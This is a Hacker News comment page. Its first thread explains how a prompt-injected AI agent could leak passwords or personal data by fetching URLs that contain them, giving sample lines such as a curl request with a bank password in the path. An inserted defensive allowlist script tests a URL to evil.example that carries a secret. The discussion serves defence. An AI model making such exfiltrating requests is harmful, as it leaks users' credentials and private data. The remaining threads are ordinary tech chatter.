Hacker News | bpicolo's comments

Don't give it write permissions?

You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.


The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.

I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.


I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.

From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.


Most web sites don't let you create service accounts; they're built for humans.

Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.

Is this reply meant to be for a different comment?

No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go mainstream, these APIs need to be more user friendly.

That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.

The thought that occurs to me is, the action here that actually needs gating is maybe not the web browsing: it's accessing credentials. That should be relatively easy to gate off behind human approval!

I'd also point out this is a place where 2FA/MFA might be super helpful. Your phone or whatever is already going to alert you. There's a little bit of a challenge in being confident your bot isn't being tricked, in ascertaining even if the bot tells you that it really is safe to approve. But it's still a deliberation layer to go through. Our valuable things do often have these additional layers of defense to go through that would require somewhat more advanced systems to bot through, that I don't think are common at all.

Overall I think the will here to reject & deny, the fear uncertainty and doubt is both valid and true, but that people are trying way way way too hard, and it saddens me to see such a strong manifestation of fear. I realize the techies know enough to be horrified strongly by it all, but also, I really want us to be an excited forward looking group, that is interested in tackling challenges, rather than being interested only in critiques & teardowns. This feels like an incredible adventure & I wish to en Courage everyone.


You do need to gate the web browsing. 2FA and/or credential storage helps with passwords, but it doesn't help with other private information. If the claw is currently, or was recently, working with any files on your computer or any of your personal online accounts, then the contents of those files/webpages are in the model context. So a simple HTTP request to example.com/<base64(personal info)> presents the exact same risk.

You can take whatever risks you feel are acceptable for your personal usage - probably nobody cares enough to target an effective prompt-injection attack against you. But corporations? I would bet a large sum of money that within the next few years we will be hearing multiple stories about data breaches caused by this exact vulnerability, due to employees being lazy about limiting the claw's ability to browse the web.
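An added example, not part of any comment in this thread: a minimal harness-side egress check that combines the domain allowlist suggested above with a scan of the outgoing URL for protected values in plain, hex or base64 form. The hostnames, the secret and the function names are constructed for illustration.

```python
import base64
from urllib.parse import urlsplit, unquote

# Constructed allowlist: exact hostnames the agent may contact.
ALLOWED_HOSTS = {"docs.python.org", "api.github.com"}
MIN_SECRET_LEN = 6  # shorter values would match too many benign URLs


def _encodings(secret: str) -> set[str]:
    """Plain, hex and base64 renderings of a protected value, lowercased."""
    raw = secret.encode()
    forms = {
        secret,
        raw.hex(),
        base64.b64encode(raw).decode().rstrip("="),
        base64.urlsafe_b64encode(raw).decode().rstrip("="),
    }
    return {f.lower() for f in forms}


def check_request(url: str, secrets: list[str]) -> tuple[bool, str]:
    """Decide whether the agent harness may send a request to `url`."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme not https"
    # .hostname ignores any userinfo, so "allowed.host@other.host" resolves
    # to other.host and is rejected by the exact-match allowlist.
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    # Second layer: even an allowed host should not receive protected values.
    # This only catches the listed encodings of a whole value; a re-chunked or
    # otherwise transformed value passes, so the allowlist stays the main control.
    haystack = unquote(parts.path + "?" + parts.query).lower()
    for secret in secrets:
        if len(secret) < MIN_SECRET_LEN:
            continue
        if any(form in haystack for form in _encodings(secret)):
            return False, "URL carries a protected value"
    return True, "ok"


if __name__ == "__main__":
    secret = "hunter2-bank-pw"  # constructed sample value
    for u in ("https://api.github.com/repos/octocat",
              "https://evil.example/" + secret,
              "https://api.github.com/search?q=" + secret.encode().hex()):
        print(u, "->", check_request(u, [secret]))
```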


The ground can already support the weight. Anything whatsoever in between the ground and the occupants is sufficient if your goal is to separate their feet from it.

> It's made from a renewable resource (wood) and there's some 400+ million metric tons of paper production yearly

They don’t mean production volume, they mean physically. You can’t increase the thickness of paper by 1000x to just make thicker, stronger, paper. It’s a different material entirely.


In a cold climate it's essential to have air/insulation between the floor and ground.

It's equally possible that it's phishing of some sort instead of genuine recruiting, so do be careful

I am thinking identity theft. They make you talk, record you so they can speak again with your voice.

I only answer by phone to numbers in my contact nowadays, unless I know I have something scheduled with someone but do not yet know the exact number that will call me.


Going to be? Already is!


> The ideal team size now appears to be 2-3 engineers per project

That's pretty much always been true for greenfield that doesn't require large swaths of boilerplate (e.g. integrations)


boilerplate and integrations are now mostly done through AI


Citation needed.


merge.dev, nango, composio.dev, all commodity alternatives to managing integrations, with varying degrees of handholding


Hah, if only SaaS integrations were the hard part. Try integrating with insurance carriers!


Their incentives are perfectly aligned - you’re making more bugs, surely you need some AI code review to help prevent that.

It’s literally right at the end of their recommendations list in the article


The original comment said:

> an article that claims AI is oddly not as bad when it comes to generating gobbledegook

Ironically, Coderabbit wants you to believe AI is worse at generating gobbledegook.


Make the gobbledygook from your gobbledygook generator better with our proprietary gobbledygook generator.

I'm obviously taking the piss here, but the irony is amusing.


It sounds stupid but it works. I've seen it. I put Copilot on AI-generated slop PRs and hit refresh until it stops commenting. It's great seeing it take out all the dead code.


Algorithmic coding contests are not an equivalent skillset to professional software development


Amazing that 4 of the top 5 are renewables in China.


> As of 2025, The Medog Dam, currently under construction on the Yarlung Tsangpo river in Mêdog County, China, expected to be completed by 2033, is planned to have a capacity of 60 GW, three times that of the Three Gorges Dam.[3]

Meanwhile, “drill baby drill!”


Can run the UK and have capacity left over that, if considered alone, would be world's highest in current year 2025.


Does that count the dams that flood valleys and displace thousands of people, plants, and animals from their homes?


Not really that surprising.

Authoritarianism has its drawbacks obviously but one of its more efficient points is it can get things done if the will is at the top. Since China doesn't have a large domestic oil supply like the US it is a state security issue to get off oil as fast as possible.


It’s become clear that some form of top down total technocratic control like China has implemented is essential for pushing humanity forward.


It's amazing what a dictatorship can do when it's not captured by oil interests and Israel.


Because it's cheaper. That's it.


That came later. Didn't have those earlier on.

Unless Extreme Potato Counter was sponsored by Big Potato...


Earlier on was only a couple of years if I remember correctly (obviously my time messing with Neopets is a little fuzzy, hardly a core memory!), especially once it was acquired by Viacom.

Did a cursory search so take all this with a grain of salt, but looking at the timeline of when ads are introduced, then the acquisition, peak users, etc. I’d say most people were playing in a pretty serious corporate sandbox for most of its most relevant years.


> “In 10 years, nearly all new data centers will be being built in outer space,” Johnston predicts.

Can I bet on the contrary odds? Could throw down my whole retirement with confidence



Yeah, who throws out this sort of timeframe in earnest? We haven't built anything in space since the ISS (which is in LEO mind you, not "outer space"), and we're building full data centers within a decade? Give me a break, that's an Elon level prediction.


I read it as something an ambitious founder would say, not to be taken literally.

Think: "AI will replace all software developers in 6 months"


This used to be called fraud, now it’s cutesy lying?


I think now it's called 'the pitch deck'


"Naughtiness," to use the technical term (https://paulgraham.com/founders.html).


> Sam Altman of Loopt is one of the most successful alumni, so we asked him what question we could put on the Y Combinator application that would help us discover more people like him. He said to ask about a time when they'd hacked something to their advantage—hacked in the sense of beating the system, not breaking into computers. It has become one of the questions we pay most attention to when judging applications.


This doesn’t seem like naughtiness. Seems like incoherence


It being an unmeasurable claim is why they get away with it.


Yep. It is now legally called puffery if you commit massive fraud. Truly we live in the best of all possible timelines.


Musk has been doing it for more than a decade now and didn't really face any real problems doing it...


Didn’t face any problems doing it… you mean when he was charged by the SEC for lying on Twitter? Or do you mean when he was forced to buy Twitter to avoid another case against him?

